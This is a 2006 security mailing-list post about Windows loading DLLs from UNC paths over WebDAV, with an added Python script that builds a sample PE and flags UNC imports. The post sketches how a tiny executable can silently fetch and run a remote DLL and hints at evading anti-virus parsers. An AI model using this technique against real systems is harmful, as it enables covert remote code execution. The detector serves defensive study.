Dailydave mailing list archives

UNC imports in PE files


From: Solar Eclipse <solareclipse () phreedom org>
Date: Tue, 7 Nov 2006 02:59:10 -0800

Hello list,

Most of you probably know that the WebDAV redirector in Windows XP tries to
resolve UNC paths from all applications with WebDAV requests on port 80. This
means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe")
and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe").

What you probably don't know is that you can use a full UNC path instead of a
DLL name in the import section of a PE file. When the file is executed, the
loader will try to access the imported DLL using the UNC path and the WebDAV
redirector will download the DLL from the Internet.

It is getting increasingly harder to draw (and defend) the boundaries between
the local machine, the local network and the Internet.

Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a
137 byte PE file that downloads a DLL over WebDAV and executes the payload in
its DllMain function. The PE file doesn't even have to contain any code,
because DllMain is executed before the entry point of the executable.

The page also has detailed information about hacking the PE header and building
the smallest possible PE file that can be executed on Windows. Its size is only
97 bytes.

If anybody is really bored, feel free to check how many anti-virus products
have PE parsers that don't handle the header of the 97 byte PE file properly
and fail to unpack and scan the code in the file.


Good night and good luck,
Solar Eclipse
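
The following is an added example, not code from the post or from the tinype page: a
small import-directory walker that flags DLL names the loader would resolve as UNC
paths, which is the check a defender wants after reading the above. It builds a
constructed PE32 sample inline (a plain headers-plus-one-section image importing
ordinal #1 from each DLL, not the 137-byte file) so it runs offline. RVAs that fall
below SizeOfHeaders are mapped 1:1 onto the file, because header-only files like
tinype keep their import tables there. The forward-slash form is flagged as well on
the assumption that Win32 path handling accepts it; the address and file names are
made up.

```python
import struct

# Constructed sample PE32 (not a real binary, not the 137-byte tinype file):
# DOS stub, PE headers and one section holding an import directory that names
# the given DLLs. Each DLL imports ordinal #1 so no hint/name table is needed.
def build_pe_with_imports(dll_names):
    file_align, sect_align, sect_rva, sect_raw = 0x200, 0x1000, 0x1000, 0x200
    desc_size = 20 * (len(dll_names) + 1)          # IMAGE_IMPORT_DESCRIPTORs + null terminator
    descs, blobs, cursor = bytearray(), bytearray(), sect_rva + desc_size
    for name in dll_names:
        ilt_rva, iat_rva = cursor, cursor + 8       # one thunk each: ordinal #1, then 0
        thunks = struct.pack("<II", 0x80000001, 0)
        name_rva, name_b = cursor + 16, name.encode() + b"\0"
        blobs += thunks + thunks + name_b
        cursor = name_rva + len(name_b)
        descs += struct.pack("<IIIII", ilt_rva, 0, 0, name_rva, iat_rva)
    descs += b"\0" * 20
    section = bytes(descs + blobs)
    vsize = len(section)
    rsize = (vsize + file_align - 1) // file_align * file_align
    size_of_image = sect_rva + (vsize + sect_align - 1) // sect_align * sect_align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 0, 0, 0, rsize, 0, sect_rva, sect_rva, sect_rva,
                      0x400000, sect_align, file_align, 4, 0, 0, 0, 4, 0,
                      0, size_of_image, sect_raw, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 8, sect_rva, desc_size)                  # DataDirectory[1] = imports
    sec_hdr = struct.pack("<8sIIIIIIHHI", b".idata", vsize, sect_rva, rsize, sect_raw,
                          0, 0, 0, 0, 0x40000040)
    headers = dos + coff + opt + bytes(dirs) + sec_hdr
    return headers.ljust(sect_raw, b"\0") + section.ljust(rsize, b"\0")


def _rva_to_offset(rva, sections, size_of_headers):
    # RVAs below SizeOfHeaders map 1:1 onto the file; tinype-style files keep
    # their import tables inside the headers, so this case must be handled.
    if rva < size_of_headers:
        return rva
    for vsize, va, rsize, raw in sections:
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
    raise ValueError("RVA %#x is not backed by the headers or any section" % rva)


def imported_dlls(data):
    """Walk the import directory and return the DLL name strings, in order."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]             # 0x10B = PE32, 0x20B = PE32+
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    fixed = 96 if magic == 0x10B else 112                      # data directories start here
    ndirs = struct.unpack_from("<I", data, opt + fixed - 4)[0]
    if ndirs < 2:
        return []                                              # no import directory entry at all
    imp_rva = struct.unpack_from("<I", data, opt + fixed + 8)[0]
    if imp_rva == 0:
        return []
    # (VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData) per section
    sections = [struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
                for i in range(nsec)]
    names, off = [], _rva_to_offset(imp_rva, sections, size_of_headers)
    while off + 20 <= len(data):
        _, _, _, name_rva, iat = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 or iat == 0:                          # loader stops at the null descriptor
            break
        start = _rva_to_offset(name_rva, sections, size_of_headers)
        names.append(data[start:data.index(b"\0", start)].decode("latin-1"))
        off += 20
    return names


def find_unc_imports(data):
    """DLL names the loader would resolve as network paths. The backslash form is
    the one the post describes; the forward-slash form is flagged as well on the
    assumption that Win32 path handling accepts it."""
    return [n for n in imported_dlls(data) if n.startswith("\\\\") or n.startswith("//")]


if __name__ == "__main__":
    sample = build_pe_with_imports([r"\\192.168.0.1\foo.dll", "kernel32.dll"])
    print("imports:    ", imported_dlls(sample))
    print("UNC imports:", find_unc_imports(sample))
```

Run it against real files with `find_unc_imports(open(path, "rb").read())`; anything it
returns is a binary whose mere execution makes the loader reach out over WebDAV before
the entry point runs, which is worth a detection rule regardless of what the code does.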


_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
